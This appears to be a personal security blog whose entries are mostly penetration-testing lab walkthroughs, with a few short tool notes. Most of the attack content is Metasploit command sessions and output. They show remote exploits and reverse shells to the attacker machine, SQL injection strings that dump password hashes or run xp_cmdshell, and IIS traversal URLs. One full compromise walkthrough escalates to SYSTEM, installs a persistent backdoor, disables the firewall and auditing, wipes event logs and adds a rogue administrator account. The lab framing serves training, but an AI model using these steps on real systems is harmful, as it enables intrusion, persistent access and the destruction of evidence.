Semi Yulianto's Personal Blog

Tuesday, March 8, 2011

Password Checker

Very good online Password Checkers...

Check this out:

http://www.passwordmeter.com/

and this...

http://www.yetanotherpasswordmeter.com/

Monday, December 6, 2010

OpenVAS Client & Server Connection

OpenVAS Vulnerability Scanner is one of the world most advanced Open Source vulnerability scanner available today. For some reasons, you might find that the OpenVAS server (openvassd) didn't run properly as expected after loading all plugins.

To check OpenVAS Client & Server connection, we can issue this command:

root@bt:/usr/local/sbin# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
cupsd 5491 root 2u IPv4 18281 TCP localhost:ipp (LISTEN)
nessusd 5759 root 4u IPv4 18917 TCP *:nessus (LISTEN)
nessusd 5759 root 6u IPv6 18920 TCP *:nessus (LISTEN)
nessusd 5759 root 8u IPv4 19018 TCP *:8834 (LISTEN)
dhclient 6245 root 5u IPv4 22498 UDP *:bootpc
openvassd 30053 root 4u IPv6 61325 TCP *:9390 (LISTEN)
OpenVAS-C 30065 root 5u IPv4 61625 TCP localhost:52713->localhost:9390 (ESTABLISHED)
openvassd 30069 root 6u IPv6 61346 TCP localhost:9390->localhost:52713 (ESTABLISHED)

OpenVAS server listens on TCP port 9390 by default.

Tuesday, November 23, 2010

PenTest Challenge (131.107.1.250)

Solutions

1. MS-DNS RPC Vulnerability (MS07-029)

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
RHOST => 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
LHOST => 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
LPORT => 443
msf exploit(ms07_029_msdns_zonename) > set TARGET 0
TARGET => 0
msf exploit(ms07_029_msdns_zonename) > exploit

2. SQL Injection Vulnerability in Joomla Component (Amblog)

Link: http://www.exploit-db.com/exploits/14596/

http://131.107.1.250/joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version

http://131.107.1.250/joomla/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

Monday, November 22, 2010

IDS Testing (Samples)

TEST-BT4 = 131.107.1.252, DEN-WEB1 = 131.107.1.101, DEN-WEB2 = 131.107.1.254, LON-IDS1 = 131.107.1.126

From TEST-BT4, launch these commands:

Anomaly Test
ping -s 65000 131.107.1.254

Port Scan Tests
nmap -sS 131.107.1.254
hping2 --scan 80,135,443,445 -S 131.107.1.254

Web Attack Tests
http://131.107.1.254/robots.txt
http://131.107.1.126/robots.txt

http://131.107.1.254/.htaccess
http://131.107.1.126/.htaccess

IIS Unicode Directory Traversal Attack Tests
http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

MS-SQL Injection Tests
http://131.107.1.101/index.asp?newscode=1'
http://131.107.1.101/index.asp?newscode=1 having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid,newsdesc having 1=1 --
http://131.107.1.101/index.asp?newscode=1;update newstable1 set newsdesc='HACKED!' where newsid=1;--
http://131.107.1.101/index.asp?newscode=1;exec master..xp_cmdshell 'dir c:\';--

Exploit Test
cd /pentest/exploits/framework3
./msfconsole

msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set RHOST 131.107.1.254
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Evading IDS Detection using Slow/Sneaky Scan Test
nmap -sS -PN -p80,443 -T1 131.107.1.254

Monday, November 15, 2010

Metasploit Autopwn with Nessus

Use SQLite3 database driver
msf > db_driver sqlite3

Create "pentest" database
msf > db_create pentest

Import Nessus scan result
msf > db_import /tmp/131_107_1_101_scan.nessus

Display matching exploit modules
msf > db_autopwn -t -x

Launch matching exploits
msf > db_autopwn -e -x -r

Display open sessions
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:34013 -> 131.107.1.101:1063
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:14816 -> 131.107.1.101:1064
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:20971 -> 131.107.1.101:1065
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:5517 -> 131.107.1.101:1066
5 meterpreter x86/win32 DEN-WEB1\IUSR_MICROSOF-3UK0WZ @ DEN-WEB1 131.107.1.252:8837 -> 131.107.1.101:1068

msf > sessions -l

msf > sessions -i 1

Tuesday, September 28, 2010

Tutorial: Exploiting IE with Windows Animated Cursor Vulnerability (MS07-017)

Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)

Step 1: Create a resource file in /sources directory

root@bt:~# nano /sources/ie_ani

Enter the following as the contents of ie_ani file.

use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.252
set SRVPORT 80
set LHOST 192.168.1.252
set LPORT 443
set URIPATH /you_win
exploit

Press Ctrl-X and Y, then press Enter to save the file.

Step 2: Launch Metasploit from its working directory

root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /sources/ie_ani

resource (/sources/ie_ani)> use windows/browser/ms07_017_ani_loadimage_chunksize
resource (/sources/ie_ani)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/sources/ie_ani)> set SRVHOST 192.168.1.252
SRVHOST => 192.168.1.252
resource (/sources/ie_ani)> set SRVPORT 80
SRVPORT => 80
resource (/sources/ie_ani)> set LHOST 192.168.1.252
LHOST => 192.168.1.252
resource (/sources/ie_ani)> set LPORT 443
LPORT => 443
resource (/sources/ie_ani)> set URIPATH /you_win
URIPATH => /you_win
resource (/sources/ie_ani)> exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.252:443
[*] Using URL: http://192.168.1.252:80/you_win
[*] Server started.

Step 3: Launch Internet Explorer (IE) on your target machine

Type the following in the URL:

http://192.168.1.252/you_win

Switch to your machine. Check if you've got the connection from your target.
Once connected, you can continue interact with Meterpreter

msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.50:1162...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.50:1162...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1163) at Wed Sep 29 12:08:22 +0800 2010

Press Enter to check the opened sessions.

msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\testuser @ LON-CL1 192.168.1.252:443 -> 192.168.1.50:1163

msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0

Check our privilege level
meterpreter > getuid
Server username: LON-CL1\testuser

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege

meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[-] core_channel_open: Operation failed: 5

Escalate our privilege
meterpreter > run kitrap0d
[*] Currently running as LON-CL1\testuser

[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\LnZbxqeuZgMB.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1316)...

--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---

[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x285ee bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 180
[?] OpenProcess(180) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d4, INFINITE);
[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier

[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
SeManageVolumePrivilege

meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[*] uploaded : /tmp/hacked.txt -> C:\WINDOWS\System32\hacked.txt

Maintain access by uploading Meterpreter agent
meterpreter > run persistence -h

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

[-] Error in script: LocalJumpError unexpected return

meterpreter > run persistence -A -X -p 443 -r 192.168.1.252
[*] Creating a persistent agent: LHOST=192.168.1.252 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613927 bytes long
[*] Uploaded the persistent agent to C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs
[*] Agent executed with PID 1732
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/LON-CL1_20100929.2413/clean_up__20100929.2413.rc

Exit from the target system.

meterpreter > exit

Step 4: Create a listener on our machine

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.252
LHOST => 192.168.1.252
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.252:443
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1176) at Wed Sep 29 12:30:27 +0800 2010

Clearing tracks (housekeeping)
meterpreter > run disable_audit

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies

OPTIONS:

-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.

meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Internal firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] External firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...

meterpreter > clearev
[*] Wiping 942 records from Application...
[*] Wiping 1984 records from System...
[*] Wiping 1 records from Security...

Enabling and Accessing Remote Desktop
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20100929.3437.rc

meterpreter > shell
Process 820 created.
Channel 18 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\testuser\Desktop>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.

C:\Documents and Settings\testuser\Desktop>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.

C:\Documents and Settings\testuser\Desktop>^C
Terminate channel 18? [y/N] y

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0

meterpreter >

Remote Desktop Connection

Open a new shell console, and run Remote Desktop client to connect to the target machine.

root@bt:~# rdesktop 192.168.1.50
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Tutorial: NTLM Authentication Hijack with SMB Relay

Local Host: 192.168.1.252 (BackTrack 4 with Metasploit 3.x)
Target Host: 192.168.1.50 (Windows XP SP2 English)

Step 1: Prepare the SMB Exploit on Local Host

cd /pentest/exploits/msf3
./msfconsole

msf > use windows/smb/smb_relay
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > exploit

Step 2: Connect to the FAKE shared folder from the remote machine

\\192.168.1.252\shared\xxx.jpg

shared\xxx.jpg is a fake link

Step 3: Interact with the open session

Wait until you've got the connection from our target machine.
Once connected, wait for a few minutes, then press Enter.

Check the active sessions
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.1.252:443 -> 192.168.1.50:1118

Interact with active session# 1
msf > sessions -i 1

[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>